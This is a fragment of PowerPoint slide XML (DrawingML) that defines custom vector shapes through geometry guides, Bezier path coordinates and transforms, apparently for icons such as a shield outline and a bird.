                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3892469"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3892469"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3892469"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3892469"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3892469"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3892469"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3892469"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3892469"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3892469"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3892469"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3892469"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3892469"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3892469"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3892469"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3892469"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3892469"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3892469"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3892469"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3892469"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3892469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2397082 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY32" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY33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2397082 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY32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2397082 w 3890413"/>
                <a:gd name="connsiteY11" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY31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0413" h="3948462">
                  <a:moveTo>
                    <a:pt x="1853384" y="1371624"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1768767" y="1390324"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1579409" y="1463487"/>
                    <a:pt x="1490873" y="1833773"/>
                    <a:pt x="1517577" y="2042010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1544281" y="2250247"/>
                    <a:pt x="1644086" y="2624290"/>
                    <a:pt x="1928990" y="2639747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2177093" y="2653207"/>
                    <a:pt x="2337423" y="2363017"/>
                    <a:pt x="2318674" y="2006358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2310210" y="1948950"/>
                    <a:pt x="2301678" y="1891436"/>
                    <a:pt x="2293344" y="1834228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2229725" y="1555945"/>
                    <a:pt x="2050691" y="1359067"/>
                    <a:pt x="1853384" y="1371624"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1594841" y="45653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2527821" y="-128041"/>
                    <a:pt x="3626282" y="158796"/>
                    <a:pt x="3869632" y="1517323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3939308" y="2058696"/>
                    <a:pt x="3820785" y="2251376"/>
                    <a:pt x="3706266" y="2457195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3132098" y="3124925"/>
                    <a:pt x="2589274" y="2611359"/>
                    <a:pt x="2548384" y="2446988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2411721" y="3024903"/>
                    <a:pt x="2005702" y="3164775"/>
                    <a:pt x="1746058" y="3093574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1486414" y="3022373"/>
                    <a:pt x="990519" y="2612821"/>
                    <a:pt x="990519" y="2019783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="990519" y="1500875"/>
                    <a:pt x="1249504" y="1067935"/>
                    <a:pt x="1593790" y="967808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1642974" y="953504"/>
                    <a:pt x="1694009" y="949376"/>
                    <a:pt x="1746058" y="945992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2004670" y="929176"/>
                    <a:pt x="2081338" y="1030119"/>
                    <a:pt x="2206475" y="1173924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194343" y="1061758"/>
                    <a:pt x="2187003" y="961165"/>
                    <a:pt x="2185910" y="877882"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2656644" y="803138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2828567" y="2099525"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2888366" y="2544108"/>
                    <a:pt x="3261961" y="2420799"/>
                    <a:pt x="3362812" y="2002360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3355320" y="1625023"/>
                    <a:pt x="3366534" y="1729632"/>
                    <a:pt x="3289926" y="1346695"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3290031" y="1346798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3068547" y="637774"/>
                    <a:pt x="2419129" y="439933"/>
                    <a:pt x="1700745" y="575031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="890947" y="727320"/>
                    <a:pt x="415476" y="1491783"/>
                    <a:pt x="571995" y="2274165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="728513" y="3056546"/>
                    <a:pt x="1580131" y="3572543"/>
                    <a:pt x="2267548" y="3408286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2796517" y="3281890"/>
                    <a:pt x="2641988" y="3320887"/>
                    <a:pt x="3194376" y="3072653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3249441" y="3306078"/>
                    <a:pt x="3239115" y="3309742"/>
                    <a:pt x="3268026" y="3509545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3021841" y="3717756"/>
                    <a:pt x="2685602" y="3836362"/>
                    <a:pt x="2347298" y="3904041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1157336" y="4112956"/>
                    <a:pt x="289475" y="3581660"/>
                    <a:pt x="42617" y="2380068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-204242" y="1178477"/>
                    <a:pt x="661862" y="219348"/>
                    <a:pt x="1594841" y="456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14E2E14-9B57-4A66-85E1-221EAEE17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6880" y="2771935"/>
              <a:ext cx="315652" cy="359610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3456727" h="3938119">
                  <a:moveTo>
                    <a:pt x="1728364" y="1961325"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1726089" y="2407152"/>
                    <a:pt x="1737463" y="2812034"/>
                    <a:pt x="1735188" y="3257861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2394830" y="3057694"/>
                    <a:pt x="2610919" y="2352560"/>
                    <a:pt x="2765594" y="1981796"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1728362" y="682044"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1355324" y="868563"/>
                    <a:pt x="1166530" y="952725"/>
                    <a:pt x="609247" y="1002767"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="606972" y="1330312"/>
                    <a:pt x="631992" y="1623739"/>
                    <a:pt x="704780" y="1964933"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="1971757"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1728363" y="1541853"/>
                    <a:pt x="1728362" y="1111948"/>
                    <a:pt x="1728362" y="682044"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1723409" y="487996"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1725062" y="488690"/>
                    <a:pt x="1726712" y="489384"/>
                    <a:pt x="1728363" y="490064"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730015" y="489384"/>
                    <a:pt x="1731666" y="488690"/>
                    <a:pt x="1733319" y="487996"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="492131"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2179467" y="679460"/>
                    <a:pt x="2405896" y="769409"/>
                    <a:pt x="2817789" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2971516" y="823489"/>
                    <a:pt x="3036247" y="875307"/>
                    <a:pt x="3033236" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3015439" y="2441328"/>
                    <a:pt x="2363638" y="3359629"/>
                    <a:pt x="1733319" y="3448048"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3449086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3448048"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1093089" y="3359629"/>
                    <a:pt x="441289" y="2441328"/>
                    <a:pt x="423491" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420479" y="875307"/>
                    <a:pt x="485211" y="823489"/>
                    <a:pt x="638937" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050832" y="769409"/>
                    <a:pt x="1277261" y="679460"/>
                    <a:pt x="1723409" y="492131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1722802" y="306889"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="311530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1222099" y="521767"/>
                    <a:pt x="967982" y="622713"/>
                    <a:pt x="505720" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333196" y="683408"/>
                    <a:pt x="260550" y="741561"/>
                    <a:pt x="263929" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283902" y="2499079"/>
                    <a:pt x="1015407" y="3529669"/>
                    <a:pt x="1722802" y="3628902"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728365" y="3630065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3628902"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2441322" y="3529669"/>
                    <a:pt x="3172826" y="2499079"/>
                    <a:pt x="3192800" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3196179" y="741561"/>
                    <a:pt x="3123532" y="683408"/>
                    <a:pt x="2951007" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2488747" y="622713"/>
                    <a:pt x="2234630" y="521767"/>
                    <a:pt x="1733925" y="311530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="306889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1732071" y="307669"/>
                    <a:pt x="1730218" y="308445"/>
                    <a:pt x="1728365" y="309209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1726510" y="308445"/>
                    <a:pt x="1724659" y="307669"/>
                    <a:pt x="1722802" y="306889"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1721800" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1723991" y="923"/>
                    <a:pt x="1726176" y="1844"/>
                    <a:pt x="1728363" y="2749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730551" y="1844"/>
                    <a:pt x="1732737" y="923"/>
                    <a:pt x="1734926" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="5497"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2325825" y="254550"/>
                    <a:pt x="2625718" y="374136"/>
                    <a:pt x="3171248" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3374850" y="446035"/>
                    <a:pt x="3460584" y="514926"/>
                    <a:pt x="3456595" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3433024" y="2596936"/>
                    <a:pt x="2569749" y="3817807"/>
                    <a:pt x="1734926" y="3935360"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3936740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3935360"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="886977" y="3817807"/>
                    <a:pt x="23703" y="2596936"/>
                    <a:pt x="132" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-3858" y="514926"/>
                    <a:pt x="81876" y="446035"/>
                    <a:pt x="285478" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="831010" y="374136"/>
                    <a:pt x="1130903" y="254550"/>
                    <a:pt x="1721800" y="54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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6065040D-3594-4BAC-A8C1-673E9B9D9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5543" y="2519661"/>
              <a:ext cx="338578" cy="33854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1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2612BCB4-6800-4D3F-84A7-B411A2B0064A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2648398">
              <a:off x="8942310" y="2514803"/>
              <a:ext cx="148930" cy="380894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7806EA61-FF58-47E3-B6B3-7DE8F13A1EEA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8651645" y="4749636"/>
              <a:ext cx="318301" cy="317452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99B57F1-325B-4FFB-91E0-0B240A518703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8268788" y="3120081"/>
              <a:ext cx="291831" cy="251871"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 241139 w 366142"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 316007"/>
                <a:gd name="connsiteX1" fmla="*/ 306633 w 366142"/>
                <a:gd name="connsiteY1" fmla="*/ 31202 h 316007"/>
                <a:gd name="connsiteX2" fmla="*/ 349699 w 366142"/>
                <a:gd name="connsiteY2" fmla="*/ 10558 h 316007"/>
                <a:gd name="connsiteX3" fmla="*/ 325569 w 366142"/>
                <a:gd name="connsiteY3" fmla="*/ 59830 h 316007"/>
                <a:gd name="connsiteX4" fmla="*/ 366142 w 366142"/>
                <a:gd name="connsiteY4" fmla="*/ 52395 h 316007"/>
                <a:gd name="connsiteX5" fmla="*/ 334454 w 366142"/>
                <a:gd name="connsiteY5" fmla="*/ 94697 h 316007"/>
                <a:gd name="connsiteX6" fmla="*/ 316939 w 366142"/>
                <a:gd name="connsiteY6" fmla="*/ 174999 h 316007"/>
                <a:gd name="connsiteX7" fmla="*/ 184305 w 366142"/>
                <a:gd name="connsiteY7" fmla="*/ 311458 h 316007"/>
                <a:gd name="connsiteX8" fmla="*/ 27716 w 366142"/>
                <a:gd name="connsiteY8" fmla="*/ 295316 h 316007"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY9" fmla="*/ 281129 h 316007"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY10" fmla="*/ 268036 h 316007"/>
                <a:gd name="connsiteX11" fmla="*/ 23178 w 366142"/>
                <a:gd name="connsiteY11" fmla="*/ 266110 h 316007"/>
                <a:gd name="connsiteX12" fmla="*/ 108726 w 366142"/>
                <a:gd name="connsiteY12" fmla="*/ 240807 h 316007"/>
                <a:gd name="connsiteX13" fmla="*/ 20535 w 366142"/>
                <a:gd name="connsiteY13" fmla="*/ 200079 h 316007"/>
                <a:gd name="connsiteX14" fmla="*/ 70653 w 366142"/>
                <a:gd name="connsiteY14" fmla="*/ 194871 h 316007"/>
                <a:gd name="connsiteX15" fmla="*/ 20899 w 366142"/>
                <a:gd name="connsiteY15" fmla="*/ 168840 h 316007"/>
                <a:gd name="connsiteX16" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY16" fmla="*/ 146258 h 316007"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY17" fmla="*/ 116697 h 316007"/>
                <a:gd name="connsiteX18" fmla="*/ 14104 w 366142"/>
                <a:gd name="connsiteY18" fmla="*/ 121836 h 316007"/>
                <a:gd name="connsiteX19" fmla="*/ 40441 w 366142"/>
                <a:gd name="connsiteY19" fmla="*/ 126434 h 316007"/>
                <a:gd name="connsiteX20" fmla="*/ 20722 w 366142"/>
                <a:gd name="connsiteY20" fmla="*/ 8541 h 316007"/>
                <a:gd name="connsiteX21" fmla="*/ 168525 w 366142"/>
                <a:gd name="connsiteY21" fmla="*/ 104817 h 316007"/>
                <a:gd name="connsiteX22" fmla="*/ 165796 w 366142"/>
                <a:gd name="connsiteY22" fmla="*/ 68430 h 316007"/>
                <a:gd name="connsiteX23" fmla="*/ 241139 w 366142"/>
                <a:gd name="connsiteY23" fmla="*/ 0 h 3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142" h="316007">
                  <a:moveTo>
                    <a:pt x="241139" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="265040" y="0"/>
                    <a:pt x="292051" y="14516"/>
                    <a:pt x="306633" y="31202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327151" y="29858"/>
                    <a:pt x="335397" y="19692"/>
                    <a:pt x="349699" y="10558"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343170" y="29574"/>
                    <a:pt x="336047" y="54091"/>
                    <a:pt x="325569" y="59830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340338" y="61437"/>
                    <a:pt x="353079" y="55334"/>
                    <a:pt x="366142" y="52395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361514" y="66282"/>
